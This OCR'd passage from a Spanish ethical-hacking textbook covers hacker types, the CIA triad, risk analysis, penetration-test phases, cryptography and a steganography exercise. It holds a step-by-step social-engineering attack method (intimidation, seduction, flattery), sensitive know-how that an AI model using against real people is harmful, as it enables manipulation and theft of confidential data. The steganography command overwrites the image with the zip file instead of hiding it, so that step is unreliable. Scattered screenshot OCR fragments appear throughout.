Sombrero Gris 


Este tipo de hacker ha sido debatido ampliamente, ya que no sigue los 
estándares de ética ni legales que sigue el de sombrero blanco, sin embargo, 
tampoco busca realizar actos delictivos por el hecho de causar daños o robar dinero, 
y, sin embargo, algunos de los hackers más hábiles que existen, operan bajo este 
“sombrero”, (incluso este libro y certificación está basado en metodologías del 
sombrero gris). 


Estos hackers simplemente atacan porque pueden, para probarse a sí mismos, 
o para mejorar la seguridad en general probando que hay una falla en esta, han 
sido tan predominantes últimamente que fuera de buscarlos con la fuerza de la ley, 
muchas empresas como Facebook, Google y Uber han decidido crear programas 
de recompensas (bug bounty) para motivar a estos hackers a continuar con esta 
actividad, pero reportar sus encuentros antes que publicarlos y dañar la imagen de 
la organización. 


Podemos decir que, estos hackers hackean fuera del marco de la ley, pero no 
para robar o dañar la seguridad de la información de una organización. 


Sombrero Negro 


Este es el tipo de hacker que todos hemos escuchado, o hasta tenidos 
encuentros con alguno, es el que sale muy seguido en las películas de Hollywood, es 
el cibercriminal. 


Este tipo de hacker es el que tiene una misión clara, comprometer la 
seguridad de la información, ¿para qué? Generalmente dinero, a veces poder, a veces 
reputación, piensa en la red como una zona de guerra, y estos son los terroristas, los 
guerreros que saquean ciudades, sin embargo, no pienses en un cibercriminal como 
cualquier otro criminal, este tipo de hacker no por ser un criminal, debes pensar en 
él como el pandillero de la esquina que te asalta con una navaja. 


Estos hackers son gente con estudios avanzados, muchos con maestrías O 
incluso doctorados, y millones de dólares en fondeo en investigación simplemente 
para crear nuevas formas de comprometer la información de las personas y 
organizaciones, algunos son guerreros, y debes pensar en ellos como exmilitares 
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altamente capacitados, algunos son creadores de armas, y debes pensar en ellos 
como lo que son, ingenieros expertos en su area, y con recursos suficientes como 
para atacar a la mayoria de las organizaciones actualmente. 


Esta es la razon por la que existimos nosotros como empresa, esta es 
la razón por la que existe este libro, sin conocimientos, estamos indefensos 
ante estos criminales, somos como un nifio intentando pelear contra un soldado 
altamente capacitado y armado, la única forma de esperar defendernos es crecer en 
conocimientos. 


1.3.2 Seguridad de la información y seguridad informática 


No toda la información está en un sistema informático, y, sin embargo, no deja 
de ser información, potencialmente sensible, y con potencial de ser comprometida. 


Dentro de la seguridad de la información se tiene que considerar todas las 
áreas en las que se pueda comprometer algún dato sensible, a mí me gusta dividirlas 
en tres áreas: 


1. Seguridad física 


Esta área es en la que se puede comprometer la seguridad del punto de 
vista físico, es decir, cualquier cosa tangible, como una puerta o ventana 
que permita acceder a un intruso, o un papel en donde esté escrito algo 
confidencial, aunque últimamente se le pone cada vez menos atención, es 
muy importante tomarlo en cuenta, ¿porque cuál es el punto de tener un 
ordenador con antivirus y mitigaciones contra ataques informáticos si un 
ladrón puede simplemente entrar por la ventana y robársela? 


Algunos ejemplos de cómo mejorar la seguridad de esta área son la 
seguridad perimetral (cercas, bardas, puertas) y el diseño de seguridad 
(transparencia, luz, espacios abiertos), entre otras cosas. 


Cabe mencionar que en esta área se considera particularmente importante 
proteger la integridad de las personas (así es, también se considera 
seguridad física proteger a las personas contra incendios, ataques 
terroristas, terremotos, etc.). 


2. Seguridad social, o ingeniería social 


Aquí lo importante es proteger la información que las personas saben, 
ya que también información sensible puede ser filtrada por ese medio. 
Por ejemplo, que alguien escuche una conversación privada y obtenga 
información sensible simplemente por escuchar y estar cerca, ¿o que tal 
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que un directivo sea seducido por una espia corporativa para que hable 
de secretos empresariales? Suena fantasioso, pero sucede mucho mas 
comun de lo que pensarias. 


Este tipo de seguridad usualmente es el área más débil de cualquier 
organización, ya que la gente es fácilmente manipulable. 


Algunas formas de mitigar esto es con buenas políticas de seguridad y 
capacitación al personal. 


3. Seguridad lógica 


Aquí finalmente podemos decir que es seguridad informática, todo lo 
anterior era seguridad de la información. La seguridad lógica es todo 
lo que está dentro de un sistema, y es de las formas más comunes de 
ataque hoy en día, puede ser un ataque a un servidor, una base de datos, 
ordenador o incluso móvil. 


Algunas de las formas en las que se puede mitigar este tipo de ataques es 
con soluciones de seguridad como firewalls, IDS, IPS y antivirus. 


En sí, todas las áreas de la seguridad de la información pueden ser mejoradas 
por medio de una auditoría en seguridad, por eso es por lo que son tan importantes. 


1.3.3 Cualidades de la seguridad de la información 


Ahora que sabes que es un hacker, debes saber, de qué formas puede ser 
comprometida la seguridad de la información. 


La seguridad de la información debe tener tres características para 
considerarse segura: 


1. Confidencialidad 


Confidencialidad significa que solo la persona que tiene permiso de ver la 
información puede poder verla. 


Un ejemplo serio que alguien viera tus conversaciones de Facebook sin 
tu permiso. 


2. Integridad 


Integridad de la información significa que la información solo debe de ser 
accedida o cambiada por la persona que tenga permiso de ello. 
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Por ejemplo, si alguien manda un correo electrónico desde tu cuenta 
porque obtuvo acceso no autorizado, compromete la integridad de la 
información. 

3. Disponibilidad 


Y la última cualidad de la información, es que esta debe de ser posible 
acceder, en el momento que se requiere, por quien tiene permiso de 
accederla. 


Un ejemplo de disponibilidad comprometida es cuando una página está 
caída y los usuarios no pueden acceder a esta. 


Siempre que un hacker vaya a atacar o defender a un activo, buscará defender 
O atacar en alguna de estas tres áreas. 


La triada de la Seguridad 


rN 
Confidencialidad 


Seguridad 
de la 
Información 


Integridad 









Disponibilidad 





1.3.4 Metodología para mejorar la seguridad de la información 


Ya que vimos las tres cosas que queremos proteger, ahora toca saber cómo 
defenderlas. Para proteger la triada de la seguridad, se debe llevar una metodología 
profesional, la cual, si es llevada de forma adecuada, mejorará de forma importante 
la seguridad de cualquier organización, y minimizará la posibilidad de un ataque 
exitoso, y, lo más importante, es que mitigara las pérdidas económicas si el ataque 
tiene éxito. 
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La metodologia consiste en 5 fases esenciales: 


1. Análisis de riesgo 


Esta fase sirve para el diagnóstico, para esto, se buscan tres cosas en 
particular, la primera siendo vulnerabilidades, que son errores que 
permitirían realizar actos que puedan comprometer la seguridad de la 
información, un ejemplo de esto podría ser que no actualizaste el servidor 
o un ordenador y por lo tanto no tienes el ultimo parche de seguridad y eres 
vulnerable a algún error en el software que tienes instalado. El segundo 
objetivo que se analiza son las amenazas, esto es la circunstancia que 
permite que se materialice el escenario en el que se cause una falla en la 
seguridad de la información, como ejemplo podría ser que un competidor 
esté buscando activamente sabotearte, ahí está el actor que busca causar 
un daño a tu infraestructura, es una amenaza, y por último; el riesgo, que 
es la probabilidad que una amenaza suceda, dando a lugar a un ataque al 
sistema, por ejemplo, no es lo mismo tener una organización en la que 
tienes vulnerabilidades críticas y varias personas que quieren atacarte 
pero ninguna tiene el conocimiento o acceso al conocimiento técnico para 
llevar a cabo el ataque, al tener una organización con vulnerabilidades 
difíciles de explotar pero con una amenaza que tiene los recursos y los 
medios para explotar dicha vulnerabilidad, y por lo que se tiene que hacer 
un análisis del porcentaje que este escenario se convierta en realidad, y 
cuántas pérdidas podría causar si se materializa. 


2. Definir nivel aceptable de riesgo 


Ningún nivel de riesgo es aceptable, muchos pensaran que sí, pero la 
realidad es que eso no existe, no existe sistema que sea 100% impenetrable, 
solo es una cuestión de cuántos recursos, tiempo y motivación tenga el 
atacante, tenemos que definir como consultor, junto al cliente, un nivel 
aceptable de riesgo. 


Este nivel aceptable de riesgo debe de ser un nivel en el que si se da la 
circunstancia, no cause pérdidas tan grandes al negocio que se pueda ver 
en problemas. Lo obvio es que lo ideal es que nunca se causen pérdidas, 
pero imaginémonos un caso, organización “x” tiene una vulnerabilidad 
y amenaza que, si se materializa, causará una pérdida de $100,000, sin 
embargo, la probabilidad de que se materialice es un 5%, y la contingencia 
para eliminar esa vulnerabilidad le costaría a la organización $100,000 
pesos, tu, siendo el tomador de decisiones, harías este gasto? (asumiendo 
que la pérdida monetaria es lo único importante, en una situación real se 
toman en cuenta un número de otros factores). 
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Probablemente no, ya que el riesgo contra el costo de mitigación y la 
potencial pérdida es demasiado, pero esos factores ayudarían a definir el 
nivel aceptable de riesgo para cada activo. 


3. Diseñar formas de medición 


Existen muchas formas en la que la seguridad puede ser comprometida, 
y no todas pueden ser medidas de la misma forma, así que se tiene que 
pensar en alguna forma de cómo medir y cuál es el nivel de seguridad 
actual, de forma que se pueda saber si se tiene que mejorar, o si se está 
en un nivel aceptable. 


Por ejemplo, fallas en ingeniería social podrían ser medibles por 
porcentaje de empleados que cayeron en “x” tipo de ataque, y fallas en 
un servidor podría medirse por número de vulnerabilidades encontradas. 


4. Implementar contramedidas 


Tomando en cuenta el nivel aceptable de riesgo, se deben de implementar 
contramedidas para llevar el nivel de riesgo actual debajo del aceptable. 


Algunas contramedidas podrían ser firewalls, IDS, antivirus, 
capacitación, etc. 


5. Evaluar constantemente 


La seguridad debe de ser considerada como la medicina para los sistemas, 
imaginemos que tuviste cáncer, pero te lo detectaron y te curaste, 
¿Dejarías de ir al doctor por ello? 


Claro que no, igual es la seguridad de la información, debe de realizarse 
un diagnóstico cada cierta cantidad de tiempo de forma que se confirme 
que el nivel de riesgo siempre es el adecuado. 


1.3.5 Retos en la seguridad de la información 


Como probablemente te habrás dado cuenta para este punto, incluso con 
nuestras metodologías y técnicas como experto en seguridad, la seguridad informática 
no es perfecta, así como un doctor por más bueno que sea es imposible salvar a todos 
los pacientes. 


Aquí te presento uno de los mayores retos a la seguridad de la información, 
otra triada. 
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En esta traida en particular, se imagina al activo que se busca asegurar en 
el centro, y en cada esquina una de tres cosas, seguridad, que se refiere a que tan 
seguro en las tres areas es un activo, usabilidad, que se refiere a que tan facil es de 
utilizar y funcionalidad, que se refiere a que tan bien hace su función principal, 
mientras más muevas el activo hacia un lado, más se aleja de los otros, por lo que 
como experto en seguridad, tenemos que aprender a encontrar un equilibrio entre 
estas tres cosas. 


Por ejemplo, digamos que queremos poner un control de acceso con control 
biométrico y contraseña en una fábrica, esto indudablemente mejoraría la seguridad, 
ya que se controlaría mejor quien y como entra la gente, sin embargo, la usabilidad 
empeoraría, ya que si tienes empleados que no tienen alta capacidad de retención, 
tendrás que capacitarlos para usar el nuevo control de acceso, y la funcionalidad 
también empeoraría contra una puerta normal, ya que por más sofisticado que sea el 
sistema, incrementa el tiempo en el que un empleado puede llegar de la entrada de la 
fábrica, a su área de trabajo. 


En muchas ocasiones estos “sacrificios” son necesarios, sin embargo, tiene 
que ser analizados cuidadosamente, ya que muchos podrían representar inversiones 
o pérdidas importantes si una solución es mal implementada. 


Seguridad 





Funcionalidad Usabilidad 


1.3.6 Ingeniería Social 


La ingeniería social es la metodología no-técnica de manipular a las 
personas por medio de sus defectos para llegar a un objetivo, usualmente malicioso. 
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Es típicamente referido como el “eslabón más débil” de cualquier 
organización, y por muy buena razón, realmente es complicado llegar a ser un gran 
hacker sin conocer mínimo los fundamentos de esta metodología de ataque. 


A pesar de ser una metodología no-técnica, sigue cierta metodología para 
llegar a un objetivo, y se toman en cuenta varias “fallas” típicas que tenemos 
inherentemente los humanos. 


Típicamente se mencionan cuatro principales fallas humanas que permiten 
un ataque de ingeniería social: 


1. Todos queremos ayudar 


Somos un animal social, está en nuestra naturaleza querer ayudar y 
agradar a la gente, y generalmente eso es algo bueno, pero un ingeniero 
social sabrá como tomar provecho de esa bondad. 


2. El primer movimiento siempre es de confianza 


A pesar de que vivimos en un mundo cada vez más peligroso, generalmente 
hablando, a menos que veamos algo que nos haga cambiar de opinión, 
al iniciar una interacción con alguien no asumimos que nos quiere hacer 
un daño, entonces, en el “primer movimiento”, usualmente estamos con 
la “guardia baja”, esa guardia baja es un buen momento para un ataque. 


3. No nos gusta decir no 


¿Nunca te ha tocado que te piden algo y tienes que decir no, o que no 
puedes hacer algo? ¿Cómo te sentiste? Probablemente sentiste algo de 
culpa o negatividad por un momento, y es normal, todos tenemos un 
impulso instintivo para buscar la aprobación de otras personas, pero 
si ese impulso es suficientemente fuerte, puede convertirse en una 
vulnerabilidad. 


4. A todos nos gusta que nos alaben 


Todos tenemos un ego, una autoimagen de nosotros en la que generalmente 
somos más atractivos, inteligentes, fuertes de lo que realmente somos, y en 
muchos de nosotros, si se nos alimenta esa parte de nuestra personalidad, 
bajaremos la guardia instantáneamente. 


Piénsalo, en algún momento ¿Alguien te ha dado un cumplido y 
automáticamente lo tratas mejor o le ayudas? o ¿viceversa? Sucede 
todo el tiempo, y es una de las herramientas preferidas de los ingenieros 
sociales para llevar a cabo sus ataques. 
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1.3.6.1 METODOLOGÍA DE UN ATAQUE DE INGENIERÍA SOCIAL 


Así como existen metodologías para ataques informáticos, para realizar 
experimentos científicos, y para muchas otras cosas, también existe una metodología 
que generalmente se sigue para llevar a cabo ataques de ingeniería social. 


La metodología no es muy compleja, sin embargo, seguirla definitivamente 
hará la diferencia entre un ataque exitoso y uno que no lo es. 


Esta metodología se conforma de 5 pasos básicos: 


1. Objetivo 


Suena obvio, pero antes de realizar cualquier ataque, un atacante debe de 
definir cuál es su objetivo. ¿Quiere obtener información clasificada? o 
¿un acceso directo? ¿Qué es lo que puede esperar obtener y cómo lo va a 
utilizar? ¿A quién vas a atacar para esto? 


Casos de ataques de ingeniería social han fracasado debido a que el 
atacante no planeó adecuadamente su objetivo y alcance esperado. 


2. Investigación previa 


Después de haber determinado el objetivo sobre qué quieres obtener y de 
quien, toca investigar a la persona. 


Muchos no saben lo complejo que es un ataque de ingeniería social, para 
hacer uno, estos ataques han sido planeados como cualquier operativo 
militar; donde se tiene que investigar todo de la persona: sus gustos, 
dónde vive, cuánto gana, su familia, etc., ya que esto se utilizara en las 
siguientes fases. 


3. Primer movimiento 


El primer “hola” es muy complejo y simple al mismo tiempo; se utiliza la 
información obtenida de la fase anterior para planear muy cuidadosamente 
cuando, como, quien y donde se hará el primer acercamiento; si la 
persona es amante de los perros, se le contactará en un parque de perros, 
es financiero, se le hablara de una oportunidad de inversión. Cada caso es 
diferente, pero esta fase es la más importante, ya que, si esta fracasa, ya 
sabemos la respuesta. 


4. “Jugada” 


Aquí es donde se explota ese primer acercamiento, algunos ataques de 
ingeniería social pueden tomar meses o hasta años dependiendo del 
objetivo, en este paso se debe de obtener la confianza de la víctima de 
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cualquier forma posible, y cuando se tenga la suficiente, llegar al objetivo, 
que puede ser desde robar una clave, hasta datos de la topologia de la red 
de una organización. 


5. Salida 


Y finalmente, un ingeniero social hábil, después de haber realizado el 
ataque, antes que la víctima se percate de la situación, éste se deberá 
haber alejado de esta, sin levantar sospechas. 





1.3.6.2 TÉCNICAS DE ATAQUES DE INGENIERÍA SOCIAL 


Así como existen diferentes técnicas para realizar ataques informáticos en 
artes marciales y otras actividades, hay diferentes técnicas que se pueden utilizar 
dentro de esta metodología para llegar a una meta. No podría mencionar todas las 
técnicas posibles en unos cuantos párrafos, pero mencionaré tres de las técnicas más 
utilizadas en ataques de ingeniería social. 


Uso de autoridad/Intimidación 


Las personas tienden a responder bastante rápido cuando se trata de una 
persona con autoridad sobre ellas, y precisamente esa es una de las formas en las 
que muchos ataques de ingeniería social son llevados a cabo, un ingeniero social 
puede hacerse pasar por el jefe de alguien, ya sea por medio de un correo electrónico, 
llamada, o incluso inventar un puesto que la víctima no conozca, si la víctima cae, 
típicamente le hará caso al atacante. 
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Es muy común que este ataque se utilice junto con intimidación, causando 
miedo en la víctima de forma que se vea presionada en actuar inmediatamente en 
favor al atacante. 


Explotación sexual 


Suena obvio, y de seguro has sido parte de algún ataque de estos o mínimo 
lo has presenciado, aquí se utiliza el coqueteo con una persona para que baje la 
guardia hacia el atacante, de este punto solo es cuestión de realizar la jugada bien, 
es uno de los ataques más peligrosos para la mayoría de las personas, especialmente 
los hombres. 


Para que te des una idea, literalmente existen “agencias” de supermodelos 
que su verdadero negocio es seducir empresarios y políticos para robar información 
confidencial y venderla o utilizarla. 


Ataque de ego 


El atacante utiliza la vanidad o el ego de la víctima, que usualmente en 
estos casos es alguien frustrado con su trabajo o que busca aprobación externa, y 
quiere probar lo inteligente o el nivel de conocimiento que tiene, el atacante podría 
pretender ser alguien a quien la víctima quiera ayudar, por ejemplo, un policía o algo 
similar, y utilizar esa falla para obtener información confidencial. 


1.3.6.3 COMO DEFENDER CONTRA ATAQUES DE INGENIERÍA SOCIAL 


La única forma de detener un ataque de ingeniería social, es detectarlo a 
tiempo, y aunque hay algunas claves típicas que menciona el instituto de seguridad 
computacional (CSI: Computer Security Institute) como que el atacante se 
rehusé a dar datos de contacto, presión, intimidación, errores pequeños, o solicitar 
información confidencial, la única forma real de mitigar este tipo de ataque, es 
entrenar a los empleados. 


Lo más efectivo seria entrenar a que los empleados piensen como un hacker, 
que aprendan y se familiaricen con ataques de hackers, y cómo funcionan y tuvieron 
éxito, para vencer al enemigo, hay que pensar como este. 


Adicionalmente, se pueden crear programas de capacitación y 
concientización. Algunas de las formas más efectivas son probarle al empleado que 
es vulnerable, realizando un “ataque” interno o de un auditor de la compañía, de 
forma que el empleado se dé cuenta que no está adecuadamente preparado, y que al 
momento en el que note algo sospechoso, reportarlo. 
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Este trabajo de capacitación es bastante complejo y laborioso, ya que es 
difícil que todo el personal de una organización este adecuadamente capacitada 
contra la mayoría de los ataques de ingeniería social, pero, cualquier mejora a la 
seguridad pone a la organización un paso más lejos de ser atacado por un hacker. 


1.3.7 Prueba de penetración 


La prueba de penetración es una herramienta en la seguridad informática, 
para identificar los riesgos amenazas y vulnerabilidades de una organización desde 
el punto de vista físico, lógico(informático) o social, simulando un ataque del hacker. 


Esto permite a la organización saber su nivel de seguridad, sus 
vulnerabilidades, y que tan débiles o fuertes están, es el equivalente a un doctor 
haciendo un chequeo médico completo. Esto NO ASEGURA al 100% que una 
organización no podrá ser atacada, ya que depende del nivel del hacker de sombrero 
blanco que realizó la prueba de penetración y del nivel del hacker de sombrero 
negro que realice el ataque malicioso contra la organización. 


1.3.7.1 METODOLOGÍA DE LA PRUEBA DE PENETRACIÓN 


¿Qué separa a un hacker profesional de un aficionado? En mi opinión, debes 
aprender la metodología adecuada, ya que no importa que tan hábil seas, si no la 
sigues ya que eventualmente te encontrarás con algún problema ya sea técnico, o 
profesional por no haberla seguido. 


Hay diferentes fuentes de donde tomar la metodología para una prueba de 
penetración, sin embargo, no tienden a diferir mucho una de otra, yo prefiero hablar 
de la metodología estándar de prueba de penetración, ya que habla no solo del lado 
técnico, sino también lo que se debe de hacer antes y después de una prueba de 
penetración. Esta metodología consiste en 7 pasos: 


1. Interacciones preliminares 


Antes de realizar cualquier paso de una prueba de penetración, aunque sea 
solo “investigar” o “escanear” a tu cliente, se debe realizar un contrato 
con el cliente. 


Este contrato puede variar dependiendo de las necesidades de tu cliente, 
pero hay algunas cosas que generalmente todo contrato pre-prueba de 
penetración debe de tener. 


e Primer punto: El alcance, en el que dice que se te permite probar y 
hacer y que no, esto es muy importante, ya que de no tomarlo en cuenta 
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te puede meter en serios problemas. Por ejemplo, estas haciendo 
un trabajo, y encuentras un servidor vulnerable a una negación de 
servicio (DOS), realizas el ataque, y, efectivamente se cae el servidor, 
sin embargo, ese era el servidor de producción, y ahora le costaste 
al cliente una buena cantidad de dinero en pérdida de información 
y productividad, que fue la razón para la que te contrataron desde el 
inicio. También aquí aplica el rango de IPs que puedes o no puedes 
probar, y si puedes realizar ataques contra la seguridad física o social 
de la organización o no. 


e Segundo punto: Medir el tiempo, ya que no puedes simplemente cobrar 
por un trabajo que no sabes cuándo lo vas a terminar, además, si se 
realiza un ataque real de un cibercriminal mientras tu estas auditando, 
es más probable que se piense que la culpa es tuya, las formas en las 
que te puedes proteger, es respetando el alcance y tiempo de auditoría. 


e Tercer punto: Adicionalmente, se deben firmar acuerdos de 
confidencialidad, tanto para tu protección como para la del cliente, 
definir metas en específico, y tácticas aceptables y no aceptables de 
ataque, por ejemplo, el cliente te puede solicitar que no ataques a sus 
empleados en lo personal, o no hagas pruebas de estrés que puedan 
tumbar un sistema. 


Hay un número de otras cosas que se deben de tomar en cuenta, sin 
embargo, sugiero leer la documentación en la fuente al final de esta 
sección o contactar a un abogado, ya que son temas legales y normativos. 


2. Obtención de información / Reconocimiento 


Antes de realizar cualquier ataque, necesitas información, esta fase 
también es llamada reconocimiento, y la meta aquí, es obtener información 
que pueda ser relevante para encontrar una debilidad por donde atacar, 
esta información puede venir de diversas fuentes, desde reconocimiento 
por medio de OSINT (Open Source Network Intelligence), que permite 
obtener información que esté públicamente disponible, pero que aun así 
sea útil, hasta escaneos directos a los sistemas para determinar sistemas 
operativos, puertos y servicios. 


Esta fase, comprensiblemente, es la más tediosa, sin embargo, sin lugar a 
dudas, es la más importante, ya que obtener información útil y relevante 
es lo que determinará el éxito o fracaso de una prueba de penetración. 


Cabe mencionar, que, en mi experiencia, aquí usualmente se invierte más 
tiempo que en cualquiera de las otras fases. 
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3. Modelado de amenazas 


Aquí como pentester, debes entender las amenazas a las que tu cliente 
se puede enfrentar, qué tipos de atacantes los pueden/quieren atacar, qué 
activos son los más valiosos o vulnerables en su organización, etc. 


Por ejemplo, en algunas compañías su centro de innovación y desarrollo 
sería el más importante, en el otro, son sus estrategias de marketing, 
mientras que en otro, podrían ser sus secretos industriales, sea cual sea 
el caso, debes modelar las posibles amenazas a las que esta organización 
se enfrenta. 


Una vez hecho el modelado de amenazas, identificadas cuáles son los 
activos que son más importantes y menos importantes para la organización 
que te ayudará a planear una prueba de penetración más eficiente. 


. Análisis de vulnerabilidades 


Aquí combinamos la información obtenida en la fase de reconocimiento, 
y la que obtuviste en el modelado de amenazas, para identificar las 
vulnerabilidades, o los puntos débiles de los activos de la organización. 


Puedes hacer este análisis de vulnerabilidades en base a investigación 
(por ejemplo en procesos, si encuentras que alguna persona tiene alguna 
característica riesgosa para la información de la organización), o en base a 
herramientas como Nessus, Acunetix u otras, que te permitirán encontrar 
puntualmente las debilidades de un activo, y como atacarlas. 


. Explotación 


En esta fase, realizamos ataques contra las debilidades que encontraste 
en la fase de análisis de vulnerabilidades que te permitan llegar a los 
activos más importante de acuerdo a las fases de reconocimiento y de 
modelado de amenazas, aquí la meta es comprometer la información en 
alguna de las tres áreas (confidencialidad, integridad, disponibilidad), 
dependiendo del objetivo. 


Para esto deberás dominar decenas de herramientas y técnicas de ataque, 
desde creación de malware hasta explotación de vulnerabilidades, de 
forma que puedas obtener acceso a tu objetivo. 


Aunque en esta fase se llega al “momento de la verdad”, en cuanto a 
comprometer o no la seguridad, en la mayoría de los casos para este punto 
ya tuvo éxito o fracaso la prueba de penetración desde antes de realizar 
el ataque, debido a que un pentester experimentado, desde el análisis de 
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vulnerabilidades, ya sabe exactamente cómo y dónde atacar para tener 
éxito. 


6. Post-explotación 


Entrar al sistema no es suficiente, luego de entrar, se necesita probar la 
gravedad del asunto, se puede probar robando algún archivo, dejando una 
nota de prueba, o, a veces, utilizando ese sistema explotado para explotar 
a otros sistemas. La metodología se llama pivote, y por este medio se 
puede utilizar a un sistema comprometido para atacar a otros sistemas 
comunicados con el primero a través de este. 


7. Informe 


Finalmente, el reporte o informe, a los técnicos usualmente no nos agrada 
mucho esta fase, pero este es tu informe, es por lo que se paga una prueba 
de penetración, así que tienes que hacerlo bien. 


Primero, usualmente se separa un informe en dos, el informe técnico, y el 
informe ejecutivo, debido a que usualmente no es la misma persona que 
va a corregir los problemas, que la que te va a pagar. 


En el informe técnico, debes narrar toda tu metodología; desde cuál 
es tu objetivo, hasta cómo obtuviste acceso a los sistemas o archivos 
comprometidos, así como documentación de cómo funcionan las 
vulnerabilidades y cómo podrías corregirlas con recomendaciones, o 
un plan de acción para corregir estas, este informe está enfocado a la 
gerencia de TI, es decir, aquí pones todos los informes de vulnerabilidades, 
capturas de pantalla, y datos técnicos que el cliente pueda necesitar para 
corregir sus fallas. 


Por otro lado, el informe ejecutivo, es el que presentas a la gerencia 
general, que usualmente son quienes te contratan. Este informe no debe 
llevar ningún dato técnico, a la gerencia le debes reportar por medio de 
gráficas entendibles y resumen, que contengan el nivel de riesgo tienen, 
para que comprendan el dinero que potencialmente se ahorraron al 
contratarte para mejorar su seguridad de la información. 


En resumen, a el técnico, le interesa la metodología técnica que usaste, y al 
ejecutivo le interesa el dinero que representa tus resultados. 
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Technical Guidelines 


Fuente para más detalles de cada paso: https://pentest-standard. org 


1.3.7.2 TIPOS DE PRUEBA DE PENETRACIÓN 


Una organización podría ser atacada desde afuera o desde dentro de distintos 
niveles, así que las pruebas de penetración se clasifican en lo que llamamos “cajas”, 
y existen tres. 


Caja Negra 


La caja negra es la más complicada de todas, este es el punto de vista de un 
atacante externo, al hacer una prueba de penetración de caja negra, el cliente no te 
dará ninguna información ni acceso interno, y atacaras 100% como si fueras alguien 
externo. 


Este es el tipo de prueba de penetración más difícil, tardada, y costosa, que 
solo pentesters experimentados deberían realizar. 


Caja Gris 


La caja gris te da cierta información y nivel de acceso, varía, pero 
generalmente te da algún acceso de algún nivel de alguien interno a la organización, 
al estar dentro, hace el trabajo más sencillo, y debes tomar en cuenta un ataque desde 
el punto de vista de un empleado. 


Este es el tipo de caja más común, ya que es el punto medio, y es bastante 
efectivo en mejorar la seguridad empresarial de una organización. 
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Caja Blanca 


La Ultima categoria es la caja blanca, aqui te dan absolutamente toda la 
informacion sobre lo que vayas a auditar, es particularmente Util, por ejemplo, 
cuando haces pruebas de penetración de código o sistemas internos, en los que 
puedes identificar errores más fácilmente si tienes conocimiento del funcionamiento 
de estos. 


WHITE ~BOX 


TESTING 





TERO KNOWLEDGE SOME KNOWLEDGE FULL ANO WLEDSE 


1.4 FORMAS DE OCULTAR INFORMACIÓN 


1.4.1 Criptografía 


Criptografía es la práctica y estudio de las técnicas que se utilizan para 
comunicación segura contra lo que llamaremos “adversarios”, tiene más de un 
siglo de ser utilizada para proteger la integridad, confidencialidad y disponibilidad 
de canales de comunicación, y el fundamento es bastante sencillo, digamos que 
queremos mandar el texto “hola” a alguien más, pero no queremos que nadie que 
intercepte la comunicación pueda leerlo, entonces cambiamos cada letra de “hola” 
por otra cosa, digamos, por un número, en el que cada letra representa su orden en 
el abecedario, entonces mandamos “816121”, haciendo que los “adversarios” que 
intercepten el mensaje no puedan leerlo, y al mandarle la “llave”, o el método para 
desencriptarla el mensaje a la persona que si quieres que reciba el mensaje, este si 
podrá leerlo. 


Esta es una simplificación de lo que es la criptografía moderna, que utiliza 
llaves públicas, privadas, y llaves asimétricas tan complejas que son esencialmente 
imposibles de romper(por métodos simples) a “fuerza bruta”, o probando todas las 
combinaciones posibles, como podría ser el caso con el ejemplo anterior, así que 
puedes ver la criptografía como si fuera un “candado” imposible de romper que 
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guarda algún secreto, sin embargo, el “adversario” sabe que hay algo ahí y que 
guarda un secreto dicho cofre con candado. 


1.4.2 Cifrado en archivos 


Hay varias formas en las que se utiliza la encriptación, una muy sencilla que 
seguro has visto implementada, es la encriptación en archivos, como los archivos PDF 
o comprimidos que necesitan una contraseña para abrir, esto es utilizar encriptación 
en un archivo. 


1.4.2.1 ENCRIPTACIÓN PUNTA-PUNTA 


fa https//whitesuithacking.com 


Connection is secure 


Your information (for example, passwords or credit 
card numbers) is private when it is sent to this site. 
Learn more 


<> JavaScript 


[Z Pop-ups and redirects 


Certificate (Valid) 
Cookies 


Site settings 





También seguramente has escuchado hablar de la encriptación punta a punta, 
por ejemplo en WhatsApp, esto significa que transmitiste una llave y te transmitieron 
una llave a ti con quien te estas comunicando, haciendo que el canal de comunicación 
entre dos personas por ejemplo, mensajeando por WhatsApp, sea privado, también se 
utiliza esto cuando entras a una página, por ejemplo PayPal, un portal de pago, o casi 
cualquier página moderna que tiene encriptación SSL, lo cual tu navegador marca 
como “seguro”, esto significa que la pagina a la que entraste está comunicándose de 
forma segura contigo, y que nadie puede interceptar fácilmente lo que transmitas por 
este medio, sin embargo, esto no significa que la pagina sea segura, solo significa que 
la comunicación entre tú y la página es privada. 
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1.4.3 Esteganografia 


Ahora, esteganografia es la otra forma de ocultar informacion, sin embargo, 
esta es diferente que criptografía, ya que, en vez de ponerle un candado a la información, 
la ocultas en algo de forma que nadie sepa que este allí, si comparamos, podríamos decir 
que criptografía seria como ocultar algo en una caja fuerte a la vista, y estenografía seria 
como un camuflaje eso mismo a plena vista, pero que nadie reconozca. 





Esteganografía: Ejemplo 


prisionero +l Prisionero A 


GUARDÍA 


ZAS E 


Por ejemplo, un uso común de esteganografía es ocultar archivos tal como 
archivos de texto, programas, u otras cosas, en archivos .mp3, .mp4, o imágenes, 
de forma que solo la persona que sepa que tiene que buscar algo ahí, va a encontrar 
algo, hagamos una práctica de una forma sencilla en la que podemos hacer esto. 





1.4.4 Practica 


Vamos a imaginar que tenemos un documento de texto con un secreto en el 
archivo secreto.txt, y queremos mandarlo a alguien oculto en una imagen, de forma 
que para nadie más se vea sospechoso. 


ImagenWS.jpe 


Open * (al 


Isecreto del Libro 
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Vamos a empezar por comprimir el archivo en un .zip 





Open With Text Editor Return 
Open With Other Application 
Cut 


Copy 
Move to... 





Copy to... 


Move to Trash 





Rename... F2 


Compress... 


Star 





Properties Certs secreto.zip 


Ahora, vamos a ocultar el archivo compreso en la imagen ImagenWS.jpg 
utilizando el comando cat secreto.zip > ImagenWS.jpg 


pH Ls 
secreto. txt 
ps cat secreto.zip > ImagenWS.jpg 
4 





¡Listo! Así de sencillo es ocultar un archivo dentro de una imagen, para 
comprobar que funciono, voy a borrar los archivos secreto.txt y secreto.zip y voy a 
sacar el archivo oculto de la imagen con el comando unzip ImagenWS.jpg. 


p# rm secreto.* 
so# ls 


; # unzip ImagenWS. jpg 
Archive: ImagenWS.jpg 
inflating: secreto.txt 
E # ls 
secreto.txt 
n# cat secreto.txt 


secreto del libro 





1.5 PREPARACIÓN DEL LABORATORIO 


Antes de iniciar con la metodología de hacking, necesitas tu propio 
laboratorio de hacking, es decir, un ambiente controlado en el que puedas practicar 
y probar los ataques que aprendes sin comprometer a sistemas internos, para esto, 
utilizaremos lo que se conoce como virtualización. 
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1.5.1 Virtualizacion 


La virtualización es la creación de un ambiente virtual por medio de software. 
Velo como una caja de arena dentro de otra caja de arena, la segunda caja de arena 
